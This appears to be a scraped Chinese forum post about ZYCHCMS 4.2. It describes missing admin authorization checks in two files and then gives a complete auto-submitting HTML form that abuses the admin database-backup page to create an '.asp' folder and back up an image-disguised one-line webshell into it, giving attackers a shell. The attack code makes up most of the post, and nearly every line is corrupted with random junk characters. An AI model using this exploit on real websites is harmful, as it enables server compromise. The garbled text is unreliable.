) r4 ]3 G E" T1 m2 I
p' e4 V, T9 Z" |+ r. V* H! G
8 e& ^5 Z5 x: z: a" w8 r( i8 f9 |7 C. m6 U% c+ f
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
, m8 i6 |9 t- y& ~" E. f ①SQL注射漏洞. Z& R/ S" E6 J4 Y2 n) H/ C. ~
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
( U5 I! g% N! ]5 ^( z* @5 l 漏洞原因:未过滤
' F$ ]: U* ?* s5 c7 M' s 漏洞代码:
- W+ d( Q3 A( f8 v" u 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。2 ^; m" g; k5 {# M
修复方法:在文件开头加入代码2 ?9 g" v g$ a9 j8 B7 P b/ K
k$ ]4 d5 R- {2 U8 j/ Y4 C/ e @* @$ M6 s; E: D# X( W4 }0 d/ |
②后台拿WBSHELL# v! S- D3 f- d" w, r& q
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。8 }8 }) P3 J( U, O7 h1 F3 x J$ u
这里在网上找了一个,改了下,将就着用。3 `9 |% ]. y1 R8 o& E8 @5 H' B
以下是代码本地提交代码
( l, }& h2 a! Z$ ~7 H $ I( u( ~. p7 d+ m- p' p8 Q6 y+ T
: z- b4 Q' X) V" \& T* x
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>6 G2 D$ `1 P; L6 W _
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>3 L+ U; Z2 u6 T' o
<tr> F- X8 ]5 p5 s2 M
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>. H& q& K5 X- `! Q9 A4 j |7 P; l9 G
</tr>+ N7 R: J$ R5 V( R8 C' T
<tr>; b' G# l* d- a2 M1 C B1 P
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>6 |6 S5 G* R5 M( O/ J% e+ Q0 ], f
</span>
6 W: D, a5 R, e5 Q4 t& M; n <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >1 D3 k( _2 m( V8 J
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >4 \& }/ C/ z, ^# X( R* [! I
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>7 W4 v) U! g+ ~; ~; W( A
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d( i5 Y' N, V: F0 v! D* q- T
<div align=”left”>
% [* y& _ Y b+ J o& J% d <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
; r6 w6 k; B2 w" n8 E, r <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>1 v/ [- [! o! M( r) C0 \! T4 p/ r
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />- o9 J& V$ I; K9 \
</div></td>
6 I1 p! }# x7 I& ]0 T5 J' I0 m! y( I </tr>3 y$ C6 X7 p2 X: A
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
1 `) p A; ^2 T% t# M# g$ ` m1 l' U! z: @ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>5 b2 \2 r5 |& C0 P
<td class=”td”><div align=”left”>) ~! T+ N( l7 k- \5 d5 y5 [0 ?
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
6 y. N5 M5 }: ~) X D4 [9 o [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
, l3 A- h+ ~. L P* M7 x </tr>
7 F( u' d# E: V <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
# O% h' R f7 h) j <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
3 ^9 R Q4 y# a+ L# k <td class=”td”><div align=”left”>
- i4 q' c0 D& w6 w: l <input type=”submit” value=”确定备份” class=”btn”
7 X$ T' f4 w- p' h3 k5 i# p _ </div></td>4 `, D1 ]: a# D5 I4 M# X7 }: `. d9 X0 e
</tr>
8 \7 k3 t9 C+ M6 q. P </table></td></tr></form>: s. S: O* c& [) F R$ r0 u
</table>) G4 g+ G W" N5 u2 B+ N
</td>0 u+ G Z2 u5 [2 ]: X
</tr>9 S) R( h( A) _0 u7 y; v
</table>
" [8 Q. M0 a& g9 e ] <script># h1 K% R, o6 Q( T8 N
document.all.add.submit();
1 z+ [5 ^4 a8 C+ w" B- ~+ r </script>
7 `) p7 i' i: d% t4 O
2 ]# i1 } W/ R6 I. ?' m+ W! I/ P; o& \
L2 a8 A- L6 T. {7 r8 y5 D9 W7 N4 V: F2 W
9 P9 {8 v) B" I! I Y
9 ^' N" b0 N. _+ t/ c2 d/ }9 W8 Z8 n& [5 M
" K" A. c4 K& h, w: u4 ~ f1 }, r% s7 R: e& S+ ]
$ a+ [8 v" y0 ]4 N; S |